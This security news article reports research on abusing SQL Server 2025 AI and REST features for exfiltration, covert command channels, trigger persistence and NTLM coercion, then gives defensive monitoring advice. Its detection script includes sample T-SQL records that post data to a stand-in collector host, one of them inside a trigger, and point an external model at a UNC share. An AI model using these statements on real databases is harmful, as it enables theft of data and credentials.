SQL Server 2025 AI Features Can Enable Data Theft
Hackers Can Abuse SQL Server 2025 AI Features to Exfiltrate Sensitive Data
Security researchers have demonstrated how Microsoft SQL Server 2025 AI features can be abused by attackers after a database environment is compromised.
SQL Server 2025 introduces powerful AI ready capabilities for modern workloads, including support for external REST endpoints, external AI models, embeddings, vector search, and integrations designed to help organizations build AI driven applications directly around enterprise data.
Those features are valuable.
They also change the security model.
Researchers from SpecterOps showed that legitimate SQL Server 2025 features can be repurposed for sensitive data exfiltration, covert command and control, persistence, and authentication hash coercion.
For enterprises, this is an important warning.
AI features inside a database engine are not only developer conveniences. They are new execution, communication, and data movement paths that must be governed, monitored, and restricted.
What Happened:
Security researchers analyzed SQL Server 2025 AI related capabilities and demonstrated how attackers could abuse them after gaining sufficient privileges inside a SQL Server environment.
One key feature is sp_invoke_external_rest_endpoint.
This stored procedure allows SQL Server to send HTTPS requests directly to external endpoints.
The feature is legitimate and useful for connecting databases to APIs and modern application workflows.
However, researchers showed that an attacker with high level SQL Server privileges could use the procedure to query sensitive tables, convert data into structured formats, and send that data to an attacker controlled server over encrypted HTTPS.
Researchers also examined CREATE EXTERNAL MODEL and AI_GENERATE_EMBEDDINGS.
These features allow SQL Server to interact with external AI models and generate embeddings from database content.
In a malicious scenario, attackers could use these AI related functions to create covert communication channels that look like normal AI workload traffic.
Why This Issue Is Critical:
This issue is critical because SQL Server often holds the data attackers want most.
Databases may contain user records, credentials, customer information, financial data, application secrets, business records, healthcare data, transaction history, operational logs, and proprietary information.
If attackers have already compromised a SQL Server instance, AI enabled features may give them a cleaner way to move data out.
Traditional defenders often watch for obvious signs of abuse such as xp_cmdshell, PowerShell execution, suspicious binaries, or unusual scripts.
SQL Server 2025 changes that assumption.
Data exfiltration may occur through a legitimate database stored procedure that sends HTTPS traffic.
Command and control may be hidden inside AI model interactions.
Persistence may be created through triggers that automatically send new or updated data to external endpoints.
That makes database monitoring and outbound traffic governance much more important.
How Data Exfiltration Could Work:
The main data theft risk centers on SQL Server’s ability to call external REST endpoints.
An attacker with sufficient privileges could query sensitive database tables and package the results into a JSON payload.
The attacker could then use sp_invoke_external_rest_endpoint to send that payload to an attacker controlled HTTPS endpoint.
Because the traffic originates from the database engine and uses encrypted web communication, it may blend in with legitimate API or AI related activity.
This is especially concerning when database servers are allowed to make outbound internet connections.
Historically, outbound traffic from a database server was often treated as suspicious.
With modern AI and API integration features, some organizations may normalize outbound database communication.
That creates a detection challenge.
Security teams need to distinguish between approved AI or API workflows and malicious data movement.
How AI Features Could Enable Covert Command Channels:
SQL Server 2025 also introduces AI model integration features that can support modern application development.
CREATE EXTERNAL MODEL can define external model connections.
AI_GENERATE_EMBEDDINGS can send data to an AI model and receive structured responses.
Researchers showed that these features could be abused to pass encoded commands and responses through AI related workflows.
Instead of deploying traditional malware, an attacker could use SQL queries and AI model calls to communicate with attacker controlled infrastructure.
This type of activity may be harder to detect because it can resemble legitimate AI workload traffic.
The database appears to be interacting with an external model.
Behind that interaction, commands and responses may be hidden inside request and response data.
This is why AI feature monitoring must include content, destination, frequency, and behavioral baselines.
Persistence Through Database Triggers:
Persistence is another concern.
Attackers may create database triggers that automatically run when certain records are inserted or updated.
For example, if a sensitive table receives new user credentials, tokens, customer records, or transaction data, a trigger could automatically send that new data to an external endpoint.
This turns the database into a continuous leakage point.
The attacker does not need to return repeatedly to manually export data.
Once the trigger is created, the database itself can continue sending fresh information.
This kind of persistence can be difficult to notice if teams are not reviewing database objects, stored procedures, triggers, outbound traffic, and unusual changes to schema logic.
NTLM Authentication Coercion Risk:
Researchers also highlighted a technique involving UNC paths in AI model configurations.
Under certain conditions, referencing UNC paths can trigger NTLM authentication attempts over SMB.
Attackers may attempt to capture or relay those authentication attempts inside a network.
This matters because NTLM relay and coercion techniques remain valuable in Windows environments.
Even when a feature is not classified as a traditional software vulnerability, the behavior can still create real operational risk if attackers can use it to force authentication or support lateral movement.
Organizations should treat database initiated SMB behavior as suspicious unless there is a clear business requirement.
How the Attack Chain Could Work:
A realistic attack path may begin when attackers compromise a SQL Server environment through stolen credentials, application compromise, exposed database access, privilege escalation, or insider abuse.
The attacker obtains high level SQL Server privileges.
Sensitive database tables are identified.
The attacker uses sp_invoke_external_rest_endpoint to send selected records to an external HTTPS endpoint.
The attacker configures external model calls to support covert communication.
The attacker creates triggers to exfiltrate future records automatically.
The attacker attempts to abuse UNC path behavior to trigger NTLM authentication and support further movement.
The database becomes both a data source and a communication channel.
This attack chain shows why SQL Server 2025 AI features must be controlled as privileged capabilities.
Why This Incident Matters for Cybersecurity:
This research reinforces a major cybersecurity reality.
Legitimate enterprise features can become attacker tools after compromise.
AI integration inside SQL Server is not inherently malicious.
It can support modern applications, retrieval augmented generation, embeddings, analytics, and intelligent data workflows.
The risk appears when attackers obtain privileges and repurpose those same features for malicious activity.
This is the same pattern defenders have seen with scripting engines, remote management tools, cloud APIs, SaaS integrations, and automation platforms.
The more powerful the feature, the more important governance becomes.
SQL Server 2025 shows that AI adoption must include database security, outbound network controls, privilege review, and monitoring from day one.
Common Risks Highlighted:
This SQL Server 2025 research highlights several common enterprise weaknesses.
Database servers may have unnecessary outbound internet access.
Sysadmin privileges may be assigned too broadly.
External REST endpoint usage may not be monitored.
AI model integrations may be enabled without security review.
Database triggers may not be reviewed regularly.
Outbound HTTPS traffic from SQL Server may be treated as normal without baselines.
NTLM authentication may still be allowed in risky paths.
Database activity monitoring may focus only on logins and failed queries.
Security teams may lack visibility into AI related database functions.
Developers may enable powerful features without involving security teams.
These weaknesses can allow legitimate SQL Server functionality to become a post compromise attack path.
Potential Impact:
The potential impact depends on database privileges, outbound network controls, and the sensitivity of stored data.
Attackers may exfiltrate sensitive records over HTTPS.
Customer data may be stolen.
Credentials, tokens, or secrets stored in databases may be exposed.
Covert command and control may be established through AI model calls.
Database triggers may create long term data leakage.
NTLM authentication attempts may be captured or relayed.
Detection may be delayed if activity appears to come from approved SQL Server features.
Incident response may become more difficult if attackers avoid traditional malware.
The highest risk environments are those where SQL Server stores sensitive data and is allowed to communicate outbound without strict controls.
What Organizations Should Do Now:
Organizations planning to use SQL Server 2025 should review AI related database features before production deployment.
Security teams should identify where sp_invoke_external_rest_endpoint is enabled or used.
External REST endpoint destinations should be approved and restricted.
Outbound traffic from database servers should be limited to known business destinations.
Sysadmin privileges should be reduced and reviewed frequently.
Use of CREATE EXTERNAL MODEL and AI_GENERATE_EMBEDDINGS should be governed through approved workflows.
Database triggers should be reviewed for unexpected behavior.
NTLM should be restricted wherever possible.
Database servers should not be allowed to initiate SMB connections unless explicitly required.
Security teams should baseline normal AI related database traffic before enabling these features widely.
AI adoption should not happen faster than security visibility.
Detection and Monitoring Strategies:
Security teams should improve monitoring around SQL Server AI and external communication features.
Monitor execution of sp_invoke_external_rest_endpoint.
Alert on external REST calls to unapproved domains or IP addresses.
Review large payload transfers from SQL Server.
Monitor CREATE EXTERNAL MODEL usage.
Monitor AI_GENERATE_EMBEDDINGS calls and destination patterns.
Review new or modified database triggers.
Alert on SQL Server initiated outbound HTTPS traffic outside approved baselines.
Monitor SQL Server initiated SMB or NTLM activity.
Review privileged account use inside SQL Server.
Correlate database events with network telemetry, identity logs, endpoint telemetry, and proxy logs.
Detection should focus on the behavior of the database engine as a network capable application.
A database server that suddenly behaves like an outbound API client deserves attention.
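One way to apply several of the checks above to captured T-SQL statement text, as an added example that is not from the original article or from the SpecterOps research. The allowlist, finding labels and audit records are constructed for illustration, and the example assumes statement text is already being collected (for example through SQL Server Audit or Extended Events).

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts approved for database-initiated calls (hypothetical name).
APPROVED_HOSTS = {"api.approved.example"}

URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
UNC_RE = re.compile(r"\\\\[\w.-]+\\")  # \\host\ prefix of a UNC path
REST_RE = re.compile(r"\bsp_invoke_external_rest_endpoint\b", re.I)
EMBED_RE = re.compile(r"\bAI_GENERATE_EMBEDDINGS\b", re.I)
MODEL_RE = re.compile(r"\b(?:CREATE|ALTER)\s+EXTERNAL\s+MODEL\b", re.I)
TRIGGER_RE = re.compile(r"\b(?:CREATE(?:\s+OR\s+ALTER)?|ALTER)\s+TRIGGER\b", re.I)

def classify(stmt):
    """Return sorted finding labels for one audited T-SQL statement."""
    findings = set()
    urls = URL_RE.findall(stmt)
    hosts = {(urlsplit(u).hostname or "").lower() for u in urls}
    unapproved = bool(hosts - APPROVED_HOSTS)
    calls_rest = bool(REST_RE.search(stmt))
    is_model = bool(MODEL_RE.search(stmt))
    if calls_rest and unapproved:
        findings.add("rest-call-unapproved-host")
    if calls_rest and not urls:
        # URL passed in a variable: destination unknown from text alone.
        findings.add("rest-call-dynamic-url")
    if is_model and unapproved:
        findings.add("external-model-unapproved-host")
    if is_model and UNC_RE.search(stmt):
        # UNC references can trigger NTLM authentication attempts over SMB.
        findings.add("external-model-unc-path")
    if TRIGGER_RE.search(stmt) and (calls_rest or EMBED_RE.search(stmt)):
        findings.add("trigger-with-outbound-call")
    return sorted(findings)

def triage(events):
    """Return (login, findings) for each event with at least one finding."""
    return [(login, f) for login, stmt in events if (f := classify(stmt))]

# Constructed, shortened audit records (login, statement text); not real logs.
SAMPLE_AUDIT = [
    ("app_svc", "EXEC sp_invoke_external_rest_endpoint @url = N'https://api.approved.example/v1/score', @payload = @body"),
    ("sa", "EXEC sp_invoke_external_rest_endpoint @url = N'https://collector.unknown.example/in', @payload = @j"),
    ("sa", "EXEC sp_invoke_external_rest_endpoint @url = @u, @payload = @j"),
    ("dba1", r"CREATE EXTERNAL MODEL emb2 WITH (LOCATION = '\\fs9.corp.example\share\m')"),
    ("sa", "CREATE TRIGGER trg_users ON dbo.Users AFTER INSERT AS EXEC sp_invoke_external_rest_endpoint @url = N'https://collector.unknown.example/in'"),
]

if __name__ == "__main__":
    for login, findings in triage(SAMPLE_AUDIT):
        print(login, findings)
```

Matching on statement text will miss calls assembled through dynamic SQL, so treat the output as triage input to correlate with proxy and network flow logs.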
The Role of Incident Response Planning:
Incident response teams should prepare for database native exfiltration scenarios.
If suspicious SQL Server activity is detected, responders should preserve database logs, query history, job history, trigger definitions, stored procedure execution records, network flow logs, proxy logs, and endpoint telemetry.
They should identify which data was queried and whether it was sent externally.
They should review whether triggers or scheduled jobs were created for persistence.
They should determine whether external model definitions were added or modified.
If NTLM coercion is suspected, teams should review authentication logs and possible relay paths.
Credential rotation may be necessary if secrets or authentication material were stored in affected databases.
Database compromise should be investigated as both a data theft event and a potential internal movement event.
Penetration Testing Insight:
From a penetration testing perspective, SQL Server 2025 AI features should be included in modern database security assessments.
A strong assessment should evaluate whether attackers with database privileges can exfiltrate data through approved features.
Testing should review outbound controls, sysadmin access, database triggers, external endpoint usage, AI model configurations, and network egress from database servers.
It should also assess whether security teams can detect suspicious use of AI related functions.
The goal is not to avoid SQL Server 2025 AI capabilities.
The goal is to prove that those capabilities are governed, logged, restricted, and monitored.
Modern penetration testing should show whether a compromised database can become a covert communication and data exfiltration platform.
Expert Insight:
James Knight, Senior Principal at Digital Warfare, said:
“AI features inside database engines create powerful business value, but they also expand what an attacker can do after compromise. Security teams need to treat outbound database calls, external model integrations, and AI generated workflows as privileged capabilities that require governance and monitoring.”
What Security Leaders Should Prioritize:
Security leaders should treat this research as a database AI governance warning.
The immediate priority is identifying whether SQL Server 2025 AI features are being tested or deployed.
The broader priority is ensuring that database servers cannot become uncontrolled outbound communication channels.
Leaders should ask clear questions.
Which SQL Server systems can make outbound HTTPS requests?
Who can execute external REST endpoint procedures?
Which external AI models are approved?
Are AI related database functions logged?
Can we detect database initiated data exfiltration?
Are database triggers reviewed for suspicious behavior?
Is NTLM restricted around database infrastructure?
If teams cannot answer these questions quickly, the organization has a database AI visibility gap.
Call to Action:
Organizations adopting SQL Server 2025 should not treat AI database features as ordinary developer functionality.
Review privileges, restrict outbound access, monitor external REST endpoint usage, govern AI model integrations, inspect triggers, and confirm that SQL Server cannot become a stealthy data exfiltration or command channel.
